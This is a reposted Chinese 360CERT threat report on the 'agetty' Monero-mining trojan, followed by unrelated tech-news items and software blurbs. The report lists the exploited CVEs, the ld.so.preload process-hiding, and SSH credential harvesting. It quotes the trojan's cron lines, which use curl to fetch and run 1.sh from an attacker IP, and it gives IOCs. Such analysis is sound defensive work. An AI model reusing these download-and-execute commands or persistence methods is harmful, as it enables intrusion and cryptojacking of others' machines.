挖矿木马 agetty 来袭-低调大师

挖矿木马 agetty 来袭

2021-12-17 776

报告编号：B6-2021-121601
报告来源：360CERT
报告作者：360CERT
更新日期：2021-12-16

木马简述

近期 360 安全大脑监测到一款名为 agetty 的挖矿木马，利用 GitLab 远程命令执行漏洞(CVE-2021-22205)等进行攻击，入侵后通过 SSH 连接进行横向移动，同时添加恶意计划任务，并隐藏挖矿进程，最终投递 xmrig 挖矿程序进行牟利。

分析木马内容

agetty 的挖矿木马利用以下漏洞进行攻击：

序号	漏洞名称	漏洞编号
1	Atlassian Confluence远程代码执行漏洞	CVE-2021-26084
2	GitLab ExifTool远程命令执行漏洞	CVE-2021-22205
3	WebLogic远程代码执行漏洞	CVE-2020-14882

成功利用后从http://111.85.159.55:9091/view/userBehavior/.reporter/1.sh

下载恶意脚本1.sh并执行。

1.脚本首先清除各类竞品挖矿木马家族。

2.随后将定时下载执行1.sh恶意脚本写入计划任务。

3.同时在设备上查找 config.json 挖矿配置文件，将其中的用户名替换为 agetty 木马自己的钱包地址，以期将他人的挖矿收益据为己有。

4.根据系统位数分别下载木马文件保存至 /tmp/.gvfsd-metadata、/tmp/.seapplet 并执行。

agetty 挖矿木马还会在/.ssh/config、.bash_history、/.ssh/known_hosts 等文件中搜索 SSH 凭证进行横向移动。

同时将木马内嵌的恶意 so 文件释放到 /usr/local/lib/v.so，通过 /etc/ld.so.preload 的方式进行预加载。将定时任务

0 */5 * * * curl -fsSL -k http://111.85.159.55:9091/view/userBehavior/.reporter/1.sh -O /tmp/1.sh \\n

写入到/etc/cron.d/root文件；

将定时任务

0 */5 * * * curl -fsSL -k http://111.85.159.55:9091/view/userBehavior/.reporter/1.sh -O /tmp/1.sh;bash /tmp/1.sh\\n

写入到 /var/spool/cron/root、/var/spool/cron/crontabs/root 文件。

此外，/usr/local/lib/v.so 还 hook 了 fopen、fopen64、lstat、open、readdir、rmdir、unlink、unlinkat 等等函数，过滤掉其中包含的 .mate-terminal、ld.so.preload、v.so 信息，实现隐藏自身的目的。

根据 agetty 木马的钱包地址，我们还关联到另一样本 0978fcab87c342330b7d34e6b8709124，xmrig 矿机与 config.json 配置文件分别托管在：

https://test123123123fdsafds.coding.net/p/test/d/test/git/raw/master/agetty
https://test123123123fdsafds.coding.net/p/test/d/test/git/raw/master/config.json

该钱包目前在不同矿池的算力和收益图分别如下：

关联分析

经过分析，agetty木马的恶意脚本1.sh，与友商曾经报告的MimuMiner木马的shell脚本在部分内容上具有较高的相似度。背后团伙可能存在一定关联。

左边为agetty木马的脚本内容，右边为MimuMiner脚本。

IOC

MD5：

MD5 描述 9f15f94ebcaa432b55f743509253add9 木马模块 43cbd69a5bbea0bf01abd54628a75d2b 木马模块 ab6faf8b842bd7daab61a9cb35dc9110 1.sh 6a3b0ecfded0a99ef78b35df2e61da9d 64.tar.gz 47cabcf25234fa9ee1659b6dfe939aed 86.tar.gz 0978fcab87c342330b7d34e6b8709124 木马模块 217c5e889c058c3ec7a261a654f39a0c agetty(XMRig 6.15.2) 0ac5c93ba9d7e1a1a35775aa639fdb08 config.json

矿池：

pool.supportxmr.com:443

xmr-asia1.nanopool.org:14444

钱包地址：

87EjF5M4uFCSQ2bHngLNTPgGA31aNjYvQbHvWpDkJvkYA4Zja5PG9Tdbe2TXDfEhPkD9Erh6mRW1cffw5UEbdhSpCSy1sVC

时间线

2021-12-16 : 360 高级威胁研究分析中心发布分析报告

参考链接

1、 https://mp.weixin.qq.com/s/d8citoIBpMQKsVf931PLFw

微信关注我们

原文链接：https://www.oschina.net/news/174288/agetty-trojan

转载内容版权归作者及来源网站所有！

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

极海半导体正式成为 RT-Thread 高级会员

日前，珠海极海半导体有限公司与知名物联网操作系统厂商睿赛德科技（RT-Thread）签署会员合作协议，正式成为 RT-Thread 高级会员。极海半导体将携手 RT-Thread 物联网操作系统共同打造物联网发展新生态，为工业、车载、消费电子等领域提供更加丰富、更具竞争力的芯片产品方案组合，优化产品应用开发体验。极海半导体成立于2019年12月，是艾派克微电子旗下的全资子公司，前身为艾派克物联网芯片事业部，总部为纳思达股份(中国上市企业500强，股票代码002180)。主营业务涵盖国产32位工业级通用MCU、低功耗蓝牙SoC和工业物联网SoC-eSE安全主控芯片。极海致力于为消费电子、医疗设备、智能家居、工业控制、汽车电子以及智慧能源等领域提供更优质的芯片产品与服务。 RT-Thread 是一款小而美的物联网操作系统，集实时操作系统（RTOS）内核、中间件组件于一体的技术平台，具备组件完整丰富、高度可伸缩、简易开发、超低功耗、高安全特性，支持所有主流MCU架构和编译工具，并支持各类标准接口如POSIX、CMSIS、C++应用环境、Javascript执行环境等。经过15年的累积发展，...

2021-12-17

609

喜事连连！优麒麟在获得中国信息通信研究院颁发的“可信开源项目”评估证书之后，再获“优秀开源创新企业”、“2021 年度 OSCHINA 优秀技术团队”称号。 “优秀开源创新企业” “优秀开源创新企业”评选由中国开源云联盟组织开展，其目的是推动国内开源生态产业发展，从贡献者、项目、应用案例、企业四个维度综合评选得出。优麒麟是由麒麟软件有限公司主导开发的全球开源项目，通过投票、答辩、专家评审，最终荣获中国开源云联盟授予的“2021 优秀开源创新企业”称号。 “2021年度OSCHINA优秀技术团队” “2021 年度 OSCHINA 优秀技术团队”由 OSCHINA 开源技术社区评选颁发。在综合评估优麒麟社区运营活跃度、技术文章产出质量等多方面的维度后，为优麒麟颁发了“2021 年度 OSCHINA 优秀技术团队”奖项。此番获奖不仅是优麒麟社区的荣誉，也是全体社区成员的共同荣誉，是大家共同努力的结果，促使优麒麟社区蓬勃发展。未来，优麒麟将在营造良好开源生态和技术发展方面持续努力，也期待越来越多的爱好者参与进来，为建设开源、贡献开源添砖加瓦！优麒麟社区自 2013 年成立以来，已累计发...

2021-12-17

498

资源下载

更多资源

优质分享App

近一个月的开发和优化，本站点的第一个app全新上线。该app采用极致压缩，本体才4.36MB。系统里面做了大量数据访问、缓存优化。方便用户在手机上查看文章。后续会推出HarmonyOS的适配版本。

Nacos

Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service 的首字母简称，一个易于构建 AI Agent 应用的动态服务发现、配置管理和AI智能体管理平台。Nacos 致力于帮助您发现、配置和管理微服务及AI智能体应用。Nacos 提供了一组简单易用的特性集，帮助您快速实现动态服务发现、服务配置、服务元数据、流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。

Spring

Spring框架（Spring Framework）是由Rod Johnson于2002年提出的开源Java企业级应用框架，旨在通过使用JavaBean替代传统EJB实现方式降低企业级编程开发的复杂性。该框架基于简单性、可测试性和松耦合性设计理念，提供核心容器、应用上下文、数据访问集成等模块，支持整合Hibernate、Struts等第三方框架，其适用范围不仅限于服务器端开发，绝大多数Java应用均可从中受益。

Sublime Text

Sublime Text具有漂亮的用户界面和强大的功能，例如代码缩略图，Python的插件，代码段等。还可自定义键绑定，菜单和工具栏。Sublime Text 的主要功能包括：拼写检查，书签，完整的 Python API ， Goto 功能，即时项目切换，多选择，多窗口等等。Sublime Text 是一个跨平台的编辑器，同时支持Windows、Linux、Mac OS X等操作系统。